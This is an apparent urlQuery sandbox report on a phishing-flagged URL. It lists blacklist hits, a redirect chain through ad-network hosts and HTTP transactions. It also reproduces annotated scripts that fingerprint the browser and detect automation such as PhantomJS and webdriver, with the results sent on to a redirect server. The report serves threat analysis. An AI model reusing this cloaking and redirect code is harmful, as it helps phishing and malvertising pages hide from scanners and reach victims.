Overview

URL graffcrew.com/doc/US_us/STATUS/INV37257208762875
IP 5.39.34.85
ASN AS16276 OVH SAS
Location France
Report completed 2018-08-21 03:53:23 CEST
urlQuery Alerts No alerts detected


Settings

UserAgent Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2018-08-21 2 graffcrew.com/doc/US_us/STATUS/INV37257208762875 Phishing
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 2 reports on IP: 5.39.34.85

Date UQ / IDS / BL URL IP
2018-09-03 11:49:28 +0200
0 - 2 - 2 graffcrew.com/83248TCVRUE/PAYROLL/Commercial/ 5.39.34.85
2018-08-21 10:55:07 +0200
0 - 0 - 1 graffcrew.com 5.39.34.85

Last 10 reports on ASN: AS16276 OVH SAS

Date UQ / IDS / BL URL IP
2018-11-19 04:44:00 +0100
0 - 0 - 1 tv.negrestempestes.cat/ 176.31.172.131
2018-11-19 03:39:01 +0100
0 - 0 - 1 mercur.com.uy/ 198.50.193.48
2018-11-19 03:17:26 +0100
0 - 0 - 1 phene.fr/ 178.33.135.90
2018-11-19 01:53:52 +0100
0 - 5 - 0 developus.tk/ 94.23.202.102
2018-11-19 00:52:51 +0100
0 - 1 - 0 cultivaroser.xyz/ 188.165.253.55
2018-11-19 00:28:26 +0100
0 - 0 - 1 setstat.ru/api/savePostback?token=neTouLzMl2 178.32.30.51
2018-11-18 23:56:12 +0100
0 - 0 - 0 ahrefs.com 151.80.39.61
2018-11-18 23:52:31 +0100
0 - 3 - 0 www.insurancefunda.tk/ 192.99.3.147
2018-11-18 23:45:01 +0100
0 - 0 - 1 www.hentairider.com/dead-rising-2-hentai/ 91.121.9.128
2018-11-18 23:30:37 +0100
0 - 0 - 0 utv3.us 158.69.63.110

Last 2 reports on domain: graffcrew.com

Date UQ / IDS / BL URL IP
2018-09-03 11:49:28 +0200
0 - 2 - 2 graffcrew.com/83248TCVRUE/PAYROLL/Commercial/ 5.39.34.85
2018-08-21 10:55:07 +0200
0 - 0 - 1 graffcrew.com 5.39.34.85


JavaScript

Executed Scripts (9)


Executed Evals (2)

#1 JavaScript::Eval (size: 5318, repeated: 1) - SHA256: a6a76a343c867c0e8b0ef6339c7fec48580bc2c1e6c0ce80cd805151f90ad6f4

                                        function QCDone(d) {
    // Copies each collected client attribute from `d` into the `value` of the
    // DOM element whose id is `ci_<KEY>` (ci_SW, ci_SH, ... ci_HIL).
    //
    // Every assignment sits in its own try/catch with an empty handler, so a
    // failing write (for example getElementById returning null for a missing
    // element) is silently skipped and the remaining fields are still written.
    //
    // NOTE(review): presumably the ci_* elements are hidden form inputs that are
    // serialized into the follow-up request to the same host; the cobalten.com
    // request recorded later in this report carries the same keys in lower case
    // (sw, sh, sah, wx, wy, ww, wh, cw, wiw, wih, wfc, pl, drf, np, pt, nb, ng,
    // dm, cf, nw, hil). The form markup itself is not part of this capture.
    //
    // NOTE(review): ci_DM and ci_HIL are written below, but nothing in this
    // captured eval assigns QC.DM or QC.HIL. The recorded request shows
    // dm=undefined and hil=undefined, which is consistent with that.
    try {
        document.getElementById('ci_SW').value = d.SW
    } catch (e) {}
    try {
        document.getElementById('ci_SH').value = d.SH
    } catch (e) {}
    try {
        document.getElementById('ci_SAH').value = d.SAH
    } catch (e) {}
    try {
        document.getElementById('ci_WX').value = d.WX
    } catch (e) {}
    try {
        document.getElementById('ci_WY').value = d.WY
    } catch (e) {}
    try {
        document.getElementById('ci_WW').value = d.WW
    } catch (e) {}
    try {
        document.getElementById('ci_WH').value = d.WH
    } catch (e) {}
    try {
        document.getElementById('ci_CW').value = d.CW
    } catch (e) {}
    try {
        document.getElementById('ci_WIW').value = d.WIW
    } catch (e) {}
    try {
        document.getElementById('ci_WIH').value = d.WIH
    } catch (e) {}
    try {
        document.getElementById('ci_WFC').value = d.WFC
    } catch (e) {}
    try {
        document.getElementById('ci_PL').value = d.PL
    } catch (e) {}
    try {
        document.getElementById('ci_DRF').value = d.DRF
    } catch (e) {}
    try {
        document.getElementById('ci_NP').value = d.NP
    } catch (e) {}
    try {
        document.getElementById('ci_PT').value = d.PT
    } catch (e) {}
    try {
        document.getElementById('ci_NB').value = d.NB
    } catch (e) {}
    try {
        document.getElementById('ci_NG').value = d.NG
    } catch (e) {}
    // DM is never populated by this script (see note at the top of the function).
    try {
        document.getElementById('ci_DM').value = d.DM
    } catch (e) {}
    try {
        document.getElementById('ci_CF').value = d.CF
    } catch (e) {}
    try {
        document.getElementById('ci_NW').value = d.NW
    } catch (e) {}
    // HIL is never populated by this script (see note at the top of the function).
    try {
        document.getElementById('ci_HIL').value = d.HIL
    } catch (e) {}
}
// Client-environment record. QCDone(), defined earlier in this eval, copies
// these fields into the page's ci_* elements.
//
// Each probe runs in its own try/catch and falls back to a sentinel (-1 for
// numeric and flag fields, '' for strings), so a throwing probe never prevents
// the others from being recorded.
//
// Analyst note: the geometry fields plus the NP / PT / NB / NG / NW flags form
// a browser fingerprint that includes automation indicators (PhantomJS
// globals, navigator.webdriver, an empty plugin list). Presumably the server
// uses them to tell analysis tooling from real visitors, so a sandbox may be
// routed differently than a victim browser; the server-side logic is not
// visible in this capture.
var QC = {};
// SW / SH: screen width and height.
try {
    QC.SW = window.screen.width;
    QC.SH = window.screen.height
} catch (e) {
    QC.SW = -1;
    QC.SH = -1
}
// SAH: available screen height.
try {
    QC.SAH = window.screen.availHeight
} catch (e) {
    QC.SAH = -1
}
// WX / WY: window position on screen.
try {
    QC.WX = window.screenX;
    QC.WY = window.screenY
} catch (e) {
    QC.WX = -1;
    QC.WY = -1
}
// WW / WH: outer window size.
try {
    QC.WW = window.outerWidth;
    QC.WH = window.outerHeight
} catch (e) {
    QC.WW = -1;
    QC.WH = -1
}
// WIW / WIH: inner (viewport) size.
try {
    QC.WIW = window.innerWidth;
    QC.WIH = window.innerHeight
} catch (e) {
    QC.WIW = -1;
    QC.WIH = -1
}
// CW: client width of the document element.
try {
    QC.CW = document.documentElement.clientWidth
} catch (e) {
    QC.CW = -1
}
// WFC: number of frames in the top-level window; -1 if reading it throws.
try {
    QC.WFC = window.top.frames.length
} catch (e) {
    QC.WFC = -1
}
// PL: full URL of the current page.
try {
    QC.PL = document.location.href
} catch (e) {
    QC.PL = ''
}
// DRF: referrer of the current page.
try {
    QC.DRF = document.referrer
} catch (e) {
    QC.DRF = ''
}
// NP: 0 when navigator.plugins is not a PluginArray or is empty, otherwise 1.
// -1 when the check itself throws (for example if PluginArray is undefined).
try {
    QC.NP = (!(navigator.plugins instanceof PluginArray) || navigator.plugins.length == 0) ? 0 : 1
} catch (e) {
    QC.NP = -1
}
// PT: 1 when either PhantomJS global (window.callPhantom / window._phantom)
// is defined, otherwise 0.
try {
    QC.PT = window.callPhantom !== undefined || window._phantom !== undefined ? 1 : 0
} catch (e) {
    QC.PT = -1
}
// NB: 1 when navigator.sendBeacon is a function, otherwise 0.
try {
    QC.NB = typeof navigator.sendBeacon === "function" ? 1 : 0
} catch (e) {
    QC.NB = -1
}
// NG: 1 when navigator.geolocation is defined, otherwise 0.
try {
    QC.NG = navigator.geolocation !== undefined ? 1 : 0
} catch (e) {
    QC.NG = -1
}
// NW: 1 when navigator has a 'webdriver' property (regardless of its value),
// otherwise 0.
try {
    QC.NW = 'webdriver' in navigator ? 1 : 0
} catch (e) {
    QC.NW = -1
}
// CF: Flash presence flag.
//   0 = detection ran and found no major version > 0 (the default)
//   1 = a Flash major version > 0 was detected
//   2 = the detection code itself threw
// The sandbox run recorded on this page sent cf=1 in its follow-up request.
QC.CF = 0;
try {
    // `new function() {...}` builds the detector object immediately; the actual
    // probing happens in the self-invoking function at the end of the constructor.
    // NOTE(review): this looks like a copy of a widely published Flash detection
    // snippet rather than code written for this campaign — not verified here.
    var FlashDetect = new function() {
        var self = this;
        // Result fields; -1 / "" / false mean "nothing detected".
        self.installed = false;
        self.raw = "";
        self.major = -1;
        self.minor = -1;
        self.revision = -1;
        self.revisionStr = "";
        // ActiveX ProgIDs tried in order on the ActiveX branch, each with the
        // function used to read a version string from the created object.
        // getActiveXVersion is assigned further down; that is safe because these
        // callbacks only run from the self-invoking detector at the end.
        var activeXDetectRules = [{
            "name": "ShockwaveFlash.ShockwaveFlash.7",
            "version": function(obj) {
                return getActiveXVersion(obj)
            }
        }, {
            "name": "ShockwaveFlash.ShockwaveFlash.6",
            "version": function(obj) {
                // Starts from the hard-coded "6,0,21" and only replaces it when
                // setting AllowScriptAccess and querying the control both succeed.
                var version = "6,0,21";
                try {
                    obj.AllowScriptAccess = "always";
                    version = getActiveXVersion(obj)
                } catch (err) {}
                return version
            }
        }, {
            "name": "ShockwaveFlash.ShockwaveFlash",
            "version": function(obj) {
                return getActiveXVersion(obj)
            }
        }];
        // Reads the control's "$version" variable ("\$" is just "$" in a JS
        // string); returns -1 when the call throws.
        var getActiveXVersion = function(activeXObj) {
            var version = -1;
            try {
                version = activeXObj.GetVariable("\$version")
            } catch (err) {}
            return version
        };
        // Instantiates an ActiveX control by ProgID; on failure returns a marker
        // object ({activeXError: true}) instead of throwing.
        var getActiveXObject = function(name) {
            var obj = -1;
            try {
                obj = new ActiveXObject(name)
            } catch (err) {
                obj = {
                    activeXError: true
                }
            }
            return obj
        };
        // Parses a comma-separated ActiveX version string. The major number is
        // taken from the text after the first space in the first comma field,
        // so the input is expected to look like "<platform> <major>,<minor>,<rev>,..."
        // — TODO confirm against a real control.
        var parseActiveXVersion = function(str) {
            var versionArray = str.split(",");
            return {
                "raw": str,
                "major": parseInt(versionArray[0].split(" ")[1], 10),
                "minor": parseInt(versionArray[1], 10),
                "revision": parseInt(versionArray[2], 10),
                "revisionStr": versionArray[2]
            }
        };
        // Parses a plugin description string: splits on runs of spaces, takes the
        // third token as "major.minor" and the fourth token as the revision string.
        var parseStandardVersion = function(str) {
            var descParts = str.split(/ +/);
            var majorMinor = descParts[2].split(/\./);
            var revisionStr = descParts[3];
            return {
                "raw": str,
                "major": parseInt(majorMinor[0], 10),
                "minor": parseInt(majorMinor[1], 10),
                "revisionStr": revisionStr,
                "revision": parseRevisionStrToInt(revisionStr)
            }
        };
        // Strips ASCII letters and parses the rest as an integer; a NaN or 0
        // result falls back to the current self.revision.
        var parseRevisionStrToInt = function(str) {
            return parseInt(str.replace(/[a-zA-Z]/g, ""), 10) || self.revision
        };
        // Comparison helpers. None of them is called anywhere in this captured
        // eval; only FlashDetect.major is read below.
        self.majorAtLeast = function(version) {
            return self.major >= version
        };
        self.minorAtLeast = function(version) {
            return self.minor >= version
        };
        self.revisionAtLeast = function(version) {
            return self.revision >= version
        };
        self.versionAtLeast = function(major) {
            var properties = [self.major, self.minor, self.revision];
            var len = Math.min(properties.length, arguments.length);
            // NOTE(review): `i` is not declared here, so in non-strict code this
            // loop writes a global `i`. With no arguments the loop never runs and
            // the function returns undefined.
            for (i = 0; i < len; i++) {
                if (properties[i] >= arguments[i]) {
                    if (i + 1 < len && properties[i] == arguments[i]) {
                        continue
                    } else {
                        return true
                    }
                } else {
                    return false
                }
            }
        };
        // Self-invoking detector: it runs once during construction, and because
        // the function returns nothing, self.FlashDetect ends up undefined.
        self.FlashDetect = function() {
            // Plugin-based path: used whenever navigator.plugins is non-empty.
            if (navigator.plugins && navigator.plugins.length > 0) {
                var type = 'application/x-shockwave-flash';
                var mimeTypes = navigator.mimeTypes;
                if (mimeTypes && mimeTypes[type] && mimeTypes[type].enabledPlugin && mimeTypes[type].enabledPlugin.description) {
                    var version = mimeTypes[type].enabledPlugin.description;
                    var versionObj = parseStandardVersion(version);
                    self.raw = versionObj.raw;
                    self.major = versionObj.major;
                    self.minor = versionObj.minor;
                    self.revisionStr = versionObj.revisionStr;
                    self.revision = versionObj.revision;
                    self.installed = true
                }
            // ActiveX path: only when the platform string lacks "Mac" and
            // window.execScript exists.
            } else if (navigator.appVersion.indexOf("Mac") == -1 && window.execScript) {
                var version = -1;
                // Try each ProgID until one yields a version string.
                for (var i = 0; i < activeXDetectRules.length && version == -1; i++) {
                    var obj = getActiveXObject(activeXDetectRules[i].name);
                    if (!obj.activeXError) {
                        // Marked installed as soon as the control instantiates,
                        // even if no version can be read from it.
                        self.installed = true;
                        version = activeXDetectRules[i].version(obj);
                        if (version != -1) {
                            var versionObj = parseActiveXVersion(version);
                            self.raw = versionObj.raw;
                            self.major = versionObj.major;
                            self.minor = versionObj.minor;
                            self.revision = versionObj.revision;
                            self.revisionStr = versionObj.revisionStr
                        }
                    }
                }
            }
        }()
    };
    if (FlashDetect.major > 0) {
        QC.CF = 1
    }
} catch (e) {
    // Any exception during detection is reported as CF = 2 rather than "absent".
    QC.CF = 2
}
// Hand the completed record to QCDone(), which writes it into the ci_* page
// elements. A failure here is only logged to the console.
try {
    QCDone(QC)
} catch (e) {
    console.log(e)
}
                                    

#2 JavaScript::Eval (size: 613, repeated: 1) - SHA256: 7d79d7f17504a461320f713188b82fa5a1fdfd154969db17892e75294035c861

                                        var a;
// Second captured eval: records viewport size and framing state.
//   a  = viewport width, b = viewport height
//   ix = 1 when the page runs inside a frame (window.self !== window.top),
//        0 when it is the top-level window, 2 when the comparison throws
// The three values are written to the elements with ids 'a', 'b' and 'ix'.
// NOTE(review): the cobalten.com request recorded later in this report carries
// ix=0 along with x=1176 and y=754; presumably a/b are submitted as x/y, but
// the form markup is not part of this capture.
var b;
var ix;
// Size lookup with fallbacks: window.innerWidth/innerHeight first, then the
// document element's client size (only if its clientWidth is non-zero), then
// the first <body> element's client size.
if (typeof window.innerWidth != 'undefined') {
    a = window.innerWidth;
    b = window.innerHeight
} else if (typeof document.documentElement != 'undefined' && typeof document.documentElement.clientWidth != 'undefined' && document.documentElement.clientWidth != 0) {
    a = document.documentElement.clientWidth;
    b = document.documentElement.clientHeight
} else {
    a = document.getElementsByTagName('body')[0].clientWidth;
    b = document.getElementsByTagName('body')[0].clientHeight
}
try {
    ix = window.self !== window.top ? 1 : 0
} catch (e) {
    ix = 2
}
// Unlike the first eval, these writes are not guarded: a missing element makes
// getElementById return null and the assignment throws.
document.getElementById('a').value = a;
document.getElementById('b').value = b;
document.getElementById('ix').value = ix;
                                    

Executed Writes (0)



HTTP Transactions (23)


Request Response
                                        
                                            GET /doc/US_us/STATUS/INV37257208762875 HTTP/1.1 
Host: graffcrew.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         5.39.34.85
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
                                        
Date: Tue, 21 Aug 2018 01:52:51 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.26
Set-Cookie: http_uid_utm=1; expires=Thu, 23-Aug-2018 01:52:51 GMT
Location: https://go.pub2srv.com/afu.php?zoneid=1938926
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   20
Md5:    7029066c27ac6f5ef18d660d5741979a
Sha1:   46c6643f07aa7f6bfe7118de926b86defc5087c4
Sha256: 59869db34853933b239f1e2219cf7d431da006aa919635478511fabbfc8849d2

Alerts:
  Blacklists:
    - fortinet: Phishing
                                        
                                            POST / HTTP/1.1 
Host: gs.symcd.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         23.43.139.27
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx/1.12.2
Content-Length: 1425
Content-Transfer-Encoding: binary
Cache-Control: max-age=543198, public, no-transform, must-revalidate
Last-Modified: Mon, 20 Aug 2018 08:46:07 GMT
Expires: Mon, 27 Aug 2018 08:46:07 GMT
Date: Tue, 21 Aug 2018 01:52:49 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1425
Md5:    741284e70173ce1dd5b83e0be7f98add
Sha1:   b0b5b15e67dd74a04913b28393ecba7407745ff0
Sha256: 68a704150cfb7c29d6d56d773bebe989d361ea60281636ced4f1f8023af8b0d7
                                        
                                            GET /afu.php?zoneid=1938926 HTTP/1.1 
Host: go.pub2srv.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         188.72.202.220
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
                                        
Server: nginx
Date: Tue, 21 Aug 2018 01:52:49 GMT
Content-Length: 154
Connection: keep-alive
Location: https://cobalten.com/afu.php?zoneid=1938926
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff
Timing-Allow-Origin: *


--- Additional Info ---
Magic:  HTML document text
Size:   154
Md5:    cfbeaf604823f038b8b46f0ac862b98c
Sha1:   7b9eb1dac48e74fa5f418bc456cb410f88b81d98
Sha256: 20c1ab602462b7fc0d5b4cbd555cacf127b69a07a737579598ebcbc0f5b21319
                                        
                                            POST / HTTP/1.1 
Host: status.rapidssl.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=153135
Date: Tue, 21 Aug 2018 01:52:50 GMT
Etag: "5b7ae398-1d7"
Expires: Wed, 22 Aug 2018 20:10:00 GMT
Last-Modified: Mon, 20 Aug 2018 15:51:52 GMT
Server: ECS (arn/4692)
X-Cache: HIT
Content-Length: 471


--- Additional Info ---
Magic:  data
Size:   471
Md5:    d4072c2faf05d5196ba218d19b5c9bd0
Sha1:   b2a2942f0d0c179996a208c8d36af06aae7bb76f
Sha256: 5bb6fc76636d2c301db497f0df579bb9ba3d09af859cc070231517c4ccf46adf
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=167289
Date: Tue, 21 Aug 2018 01:52:50 GMT
Etag: "5b7b37ee-1d7"
Expires: Thu, 23 Aug 2018 00:20:25 GMT
Last-Modified: Mon, 20 Aug 2018 21:51:42 GMT
Server: ECS (arn/45E2)
X-Cache: HIT
Content-Length: 471


--- Additional Info ---
Magic:  data
Size:   471
Md5:    6803e2c24fb8d238b7d06608d4230fa4
Sha1:   0fe5b0c07b3529f53142b7afbcf083aeda0ae23a
Sha256: 6ad002c4194322e50e025a0e9d290016076c9eca2a49c8f4472b0e851689ae4f
                                        
                                            GET /afu.php?zoneid=1938926 HTTP/1.1 
Host: cobalten.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         188.42.162.184
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Tue, 21 Aug 2018 01:52:50 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Timing-Allow-Origin: *, *
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: SeenToday=1; expires=Wed, 22-Aug-2018 01:52:50 GMT; Max-Age=86400; path=/ OAGEO5580f=13%7CNO%7C02%7CLORENSKOG%7CXDSL%7CBROADNET+AS%7C%7C11329%7C43703%7C%3F%7C578205; expires=Wed, 22-Aug-2018 01:52:50 GMT; Max-Age=86400; path=/ oaidts=1534816370; expires=Wed, 21-Aug-2019 01:52:50 GMT; Max-Age=31536000; path=/ OAID=f8e2341405ecc01afe038fc56b44a136; expires=Wed, 21-Aug-2019 01:52:50 GMT; Max-Age=31536000; path=/ OAID=f8e2341405ecc01afe038fc56b44a136; expires=Wed, 21-Aug-2019 01:52:50 GMT; Max-Age=31536000; path=/ OFR=%7B%2230265%22%3A1%7D; expires=Fri, 16-Aug-2019 01:52:50 GMT; Max-Age=31104000; path=/ exsdsf=1534816370 pbk3=12d8a15f469dd3bae7e6d0049fe5fbe46591986116571814368; expires=Tue, 21-Aug-2018 02:02:50 GMT; Max-Age=600 ltm_afu=1; expires=Wed, 22-Aug-2018 01:52:50 GMT; Max-Age=86400; path=/
X-FRAME-OPTIONS: DENY
P3P: CP="CUR ADM OUR NOR STA NID"
X-Used-AdExchange: 1
Content-Encoding: gzip
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   4578
Md5:    63ab291d37c055949503561e1a9441c0
Sha1:   cba115b897d7f439e92db7e95718a75758985abf
Sha256: 253ceb8df20a9497de8dd00936acb9d493451bf2dfde2fd54af14d3a7a4ad826
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: cobalten.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: SeenToday=1; OAGEO5580f=13%7CNO%7C02%7CLORENSKOG%7CXDSL%7CBROADNET+AS%7C%7C11329%7C43703%7C%3F%7C578205; oaidts=1534816370; OAID=f8e2341405ecc01afe038fc56b44a136; OFR=%7B%2230265%22%3A1%7D; exsdsf=1534816370; pbk3=12d8a15f469dd3bae7e6d0049fe5fbe46591986116571814368; ltm_afu=1

                                         
                                         188.42.162.184
HTTP/1.1 204 No Content
                                        
Server: nginx
Date: Tue, 21 Aug 2018 01:52:51 GMT
Connection: keep-alive
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000, public, must-revalidate, proxy-revalidate
Pragma: public


--- Additional Info ---
                                        
                                            GET /?r=%2Fmb%2Fhan&zoneid=1938926&pbk3=12d8a15f469dd3bae7e6d0049fe5fbe46591986116571814368&empty=0&auction_id=2803b9ab-615e-4371-bf8c-7993fca3d38e&uuid=4d45b19f-ecda-4e48-85ab-a7ee53ec7b40&ad_scheme=1&rotation_type=3&ppucounter=0&first_visit=0&on_test=0&offer_views=1&ab_test=0&adparams=bm9qcz0w&ip=f3d5bb63c9dbdcfb475795d659c65a4e&x=1176&y=754&sw=1176&sh=885&sah=855&wx=-4&wy=-4&ww=1184&wh=863&cw=1176&wiw=1176&wih=754&wfc=0&pl=https%3A%2F%2Fcobalten.com%2Fafu.php%3Fzoneid%3D1938926&drf=&np=1&pt=0&nb=0&ng=1&dm=undefined&cf=1&nw=0&hil=undefined&id=dd276cca861b12cd7028beddc344a34b&co=1&rf=0&hs=d01d492f13aec958676a3d4656a2a36c&ix=0&fs=1&timeout=0 HTTP/1.1 
Host: cobalten.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cobalten.com/afu.php?zoneid=1938926
Cookie: SeenToday=1; OAGEO5580f=13%7CNO%7C02%7CLORENSKOG%7CXDSL%7CBROADNET+AS%7C%7C11329%7C43703%7C%3F%7C578205; oaidts=1534816370; OAID=f8e2341405ecc01afe038fc56b44a136; OFR=%7B%2230265%22%3A1%7D; exsdsf=1534816370; pbk3=12d8a15f469dd3bae7e6d0049fe5fbe46591986116571814368; ltm_afu=1

                                         
                                         188.42.162.184
HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Tue, 21 Aug 2018 01:52:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Timing-Allow-Origin: *, *
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: f3d5bb63c9dbdcfb475795d659c65a4e=3f1HG4OdnWPOKNekIh9MuOMnhVjpwUsQT_kcDq0fUeQ; expires=Tue, 28-Aug-2018 01:52:51 GMT; Max-Age=604800 OAGEO5580f=13%7CNO%7C02%7CLORENSKOG%7CXDSL%7CBROADNET+AS%7C%7C11329%7C43703%7C%3F%7C578205; expires=Wed, 22-Aug-2018 01:52:51 GMT; Max-Age=86400; path=/ ppucnt=1; expires=Wed, 22-Aug-2018 01:52:51 GMT; Max-Age=86400; path=/ ppucntstart=1534816371; expires=Wed, 22-Aug-2018 01:52:51 GMT; Max-Age=86400; path=/ allcnt=1; expires=Wed, 21-Aug-2019 01:52:51 GMT; Max-Age=31536000; path=/ OAID=f8e2341405ecc01afe038fc56b44a136; expires=Wed, 21-Aug-2019 01:52:51 GMT; Max-Age=31536000; path=/ OFR=%7B%2230265%22%3A2%7D; expires=Fri, 16-Aug-2019 01:52:51 GMT; Max-Age=31104000; path=/ _OACCAP[1283126]=1; expires=Wed, 21-Aug-2019 01:52:51 GMT; Max-Age=31536000; path=/ _OACBLOCK[1283126]=1534816371; expires=Thu, 20-Sep-2018 01:52:51 GMT; Max-Age=2592000; path=/ _OXCCLK[1283126]=1; expires=Wed, 21-Aug-2019 01:52:51 GMT; Max-Age=31536000; path=/ _OXPCLK[136588]=1; expires=Wed, 21-Aug-2019 01:52:51 GMT; Max-Age=31536000; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Location: https://briefext.com/Ky0vu0/?source=1938926&external_id=55586495074930688&cost=0.15
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff


--- Additional Info ---
                                        
                                            POST / HTTP/1.1 
Host: ocsp.comodoca4.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Apache
Last-Modified: Sat, 18 Aug 2018 06:39:51 GMT
Etag: 02D7F1DB0FF0B304BF75FEFA7F50544E3F105B1A
X-OCSP-Responder-ID: rmdccaocsp27
Content-Length: 279
Cache-Control: public, no-transform, must-revalidate, max-age=362270
Expires: Sat, 25 Aug 2018 06:30:41 GMT
Date: Tue, 21 Aug 2018 01:52:51 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   279
Md5:    129f20166c3691dfff4aab2cb083013e
Sha1:   02d7f1db0ff0b304bf75fefa7f50544e3f105b1a
Sha256: 26bc8f0a63c693d9dc09f09e9a3d731602b505019e032fe1628f4fb36ccc455c
                                        
                                            POST / HTTP/1.1 
Host: ocsp.comodoca4.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
